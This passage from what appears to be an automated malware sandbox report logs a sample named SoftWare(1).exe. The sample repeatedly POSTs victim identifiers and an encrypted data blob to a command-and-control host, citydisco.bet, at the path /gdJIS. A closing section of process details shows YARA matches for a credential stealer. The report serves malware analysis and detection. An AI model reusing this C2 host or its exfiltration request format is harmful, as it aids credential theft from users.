                                                            Data Ascii: 45{"success":{"message":"message success delivery from 96.253.81.113"}}
                                                            2025-03-13 06:45:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449713188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:10 UTC275OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=JaB2pwKrYBtAs
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8767
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:10 UTC8767OUTData Raw: 2d 2d 4a 61 42 32 70 77 4b 72 59 42 74 41 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 0d 0a 2d 2d 4a 61 42 32 70 77 4b 72 59 42 74 41 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 61 42 32 70 77 4b 72 59 42 74 41 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 43 37
                                                            Data Ascii: --JaB2pwKrYBtAsContent-Disposition: form-data; name="uid"ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929--JaB2pwKrYBtAsContent-Disposition: form-data; name="pid"2--JaB2pwKrYBtAsContent-Disposition: form-data; name="hwid"62C7
                                                            2025-03-13 06:45:11 UTC814INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sEobtaO8kTO0%2Fqs23CbFgl2Zbo%2BtS6I%2BpqaMO4PZ99DDjFDudiZ1d6kDqvVtltSuFejDfusG5Wg7D9wb%2FF6dHmJ9iZfjRMFApAOP1kEJ%2F2l0USlhkZf3bWAcxmNui%2BTm"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f99126bffd59ec-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18548&min_rtt=14891&rtt_var=7470&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9700&delivery_rate=194388&cwnd=249&unsent_bytes=0&cid=970b67ff331f8ac6&ts=886&x=0"
                                                            2025-03-13 06:45:11 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 33 2e 38 31 2e 31 31 33 22 7d 7d 0d 0a
                                                            Data Ascii: 45{"success":{"message":"message success delivery from 96.253.81.113"}}
                                                            2025-03-13 06:45:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449716188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:13 UTC274OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=iCD1N6tejgN
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20410
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:13 UTC15331OUTData Raw: 2d 2d 69 43 44 31 4e 36 74 65 6a 67 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 0d 0a 2d 2d 69 43 44 31 4e 36 74 65 6a 67 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 69 43 44 31 4e 36 74 65 6a 67 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 43 37 31 32 39 33 30 37
                                                            Data Ascii: --iCD1N6tejgNContent-Disposition: form-data; name="uid"ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929--iCD1N6tejgNContent-Disposition: form-data; name="pid"3--iCD1N6tejgNContent-Disposition: form-data; name="hwid"62C7129307
                                                            2025-03-13 06:45:13 UTC5079OUTData Raw: a4 c0 e2 a0 20 bf 83 16 12 9e 0a 52 08 4b 0e b5 f7 20 03 26 a2 16 9f 7f 8f 91 3d b3 bb b8 9e 3e 3b 3d d5 17 bf 1d 25 27 ba 6d b8 ce 46 cf 71 cc 1e 09 67 be 87 78 24 72 99 1e 92 6e e6 5b eb cc 7f 99 65 4b 88 bf c1 5f bc f0 8d fb a2 f2 29 9e 5d 58 aa e8 e6 8a 85 5b d2 b5 67 2e a4 f3 bb f2 4a 9b 52 f0 22 a7 0e f5 44 b4 b5 ca 45 69 6d 73 f3 9d a0 ec 33 b2 48 3e 38 3e 3e 4d e6 8a 76 81 a1 56 19 c2 77 78 e7 65 04 41 10 2f 1e 33 af 52 34 72 6c 00 3b f3 8c 4d 86 c5 fc c7 aa bf d6 30 32 ea 11 4d a7 a5 0e 0d 31 32 ed e6 aa 23 28 48 17 62 0f fd 0d c6 9f ec fb 73 60 a6 95 35 c8 7c 20 97 ef e9 5b 38 00 c8 69 90 b6 2d 5d c5 4a a2 2c 23 03 f7 6e 41 42 da 79 05 da e2 08 80 a4 21 73 c1 9c d4 84 13 66 49 34 9b 8c df cb 70 05 b4 82 22 c9 69 2b 1e 2f f9 af 29 13 d2 4b 4d 58
                                                            Data Ascii: RK &=>;=%'mFqgx$rn[eK_)]X[g.JR"DEims3H>8>>MvVwxeA/3R4rl;M02M12#(Hbs`5| [8i-]J,#nABy!sfI4p"i+/)KMX
                                                            2025-03-13 06:45:14 UTC817INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t2dyOKJuFhAc8sH4FbRTt%2F23%2BiGPgeitsZs6GgdAHck%2BbMr%2FFhEkPrm53KssXg4KP%2BeNSfFCSAXIuyrj7uvpZ6rZhaqMtq4KV2vLaKYD%2FaL7vXlwvEEiSUB7YaqP4eas"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f99137e94f9c8a-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18346&min_rtt=15100&rtt_var=7159&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21364&delivery_rate=191673&cwnd=236&unsent_bytes=0&cid=02e3f784eab89cf9&ts=1025&x=0"
                                                            2025-03-13 06:45:14 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 33 2e 38 31 2e 31 31 33 22 7d 7d 0d 0a
                                                            Data Ascii: 45{"success":{"message":"message success delivery from 96.253.81.113"}}
                                                            2025-03-13 06:45:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449718188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:16 UTC278OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=AKrjJRRAxfjBYO8V
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 2235
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:16 UTC2235OUTData Raw: 2d 2d 41 4b 72 6a 4a 52 52 41 78 66 6a 42 59 4f 38 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 0d 0a 2d 2d 41 4b 72 6a 4a 52 52 41 78 66 6a 42 59 4f 38 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4b 72 6a 4a 52 52 41 78 66 6a 42 59 4f 38 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64
                                                            Data Ascii: --AKrjJRRAxfjBYO8VContent-Disposition: form-data; name="uid"ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929--AKrjJRRAxfjBYO8VContent-Disposition: form-data; name="pid"1--AKrjJRRAxfjBYO8VContent-Disposition: form-data; name="hwid
                                                            2025-03-13 06:45:17 UTC808INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dovzZMZcqOPqW2vl4lNnkW0MbCqiv2DfnK2b6RXDYzpvTSoxQ4eSvRZ%2Bd9SG1VG3vIGxjQTGjXnuCLiGTTYUruYBorY9k6WpoJ9VyTzofZ%2BmQ3Av2Sf%2Fxzfv4Z3qYocP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f9914cc9b58238-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18418&min_rtt=14553&rtt_var=7560&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3149&delivery_rate=198873&cwnd=234&unsent_bytes=0&cid=0ca1fc8c41fd02f0&ts=1224&x=0"
                                                            2025-03-13 06:45:17 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 33 2e 38 31 2e 31 31 33 22 7d 7d 0d 0a
                                                            Data Ascii: 45{"success":{"message":"message success delivery from 96.253.81.113"}}
                                                            2025-03-13 06:45:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449720188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:19 UTC278OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=70So3FLb1abh0oMz
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1096
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:19 UTC1096OUTData Raw: 2d 2d 37 30 53 6f 33 46 4c 62 31 61 62 68 30 6f 4d 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 0d 0a 2d 2d 37 30 53 6f 33 46 4c 62 31 61 62 68 30 6f 4d 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 30 53 6f 33 46 4c 62 31 61 62 68 30 6f 4d 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64
                                                            Data Ascii: --70So3FLb1abh0oMzContent-Disposition: form-data; name="uid"ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929--70So3FLb1abh0oMzContent-Disposition: form-data; name="pid"1--70So3FLb1abh0oMzContent-Disposition: form-data; name="hwid
                                                            2025-03-13 06:45:20 UTC805INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVBJBXB2yQxZiZj2QLAeJzizk4DA1kKnL85gM3mVHtx2yx4wxmwycZwd8hS1Pdkj5XZ%2BjfG33nRnGutyOmk3CNSm9YN7vYv%2BeGUquD66WRIIrqpi8jutLRzUna18jymP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f9915e4e12b8b1-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=19137&min_rtt=17526&rtt_var=6372&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2010&delivery_rate=165117&cwnd=235&unsent_bytes=0&cid=fd2eb933c46eabba&ts=913&x=0"
                                                            2025-03-13 06:45:20 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 33 2e 38 31 2e 31 31 33 22 7d 7d 0d 0a
                                                            Data Ascii: 45{"success":{"message":"message success delivery from 96.253.81.113"}}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449727188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:22 UTC264OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 135
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:22 UTC135OUTData Raw: 75 69 64 3d 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 26 63 69 64 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 32 43 37 31 32 39 33 30 37 45 34 43 44 38 46 38 43 39 41 31 43 34 32 45 37 42 33 46 32 39 45
                                                            Data Ascii: uid=ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929&cid=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=62C7129307E4CD8F8C9A1C42E7B3F29E
                                                            2025-03-13 06:45:22 UTC772INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:22 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 43
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmZuArSkYhG7S8hoa9HwiqamcosBwJI9IdUntkLRlN5wxJeNrdIdbNd6iKeT3DgTZnh9Ywe7QgT5i%2FsSLcxNZobS4qbJXCESqFgbdVx0khtxytmwuFaGTSOwvfWmgztw"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f9916e8acf0798-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18567&min_rtt=15288&rtt_var=7241&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1035&delivery_rate=189342&cwnd=222&unsent_bytes=0&cid=db41e6694390f022&ts=918&x=0"
                                                            2025-03-13 06:45:22 UTC43INData Raw: 30 fd b1 62 28 0f fc 77 9e 95 f1 87 1f 39 cc 06 b5 e2 69 cf 21 95 df a8 25 d9 0b 04 49 8d 43 2d e1 3c e7 99 8d b4 4b e8 5c fb e8
                                                            Data Ascii: 0b(w9i!%IC-<K\


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:02:45:02
                                                            Start date:13/03/2025
                                                            Path:C:\Users\user\Desktop\SoftWare(1).exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SoftWare(1).exe"
                                                            Imagebase:0xdf0000
                                                            File size:775'488 bytes
                                                            MD5 hash:82505C38E11C312F05B2891D330CF9C1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:02:45:02
                                                            Start date:13/03/2025
                                                            Path:C:\Users\user\Desktop\SoftWare(1).exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SoftWare(1).exe"
                                                            Imagebase:0xdf0000
                                                            File size:775'488 bytes
                                                            MD5 hash:82505C38E11C312F05B2891D330CF9C1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Reset < >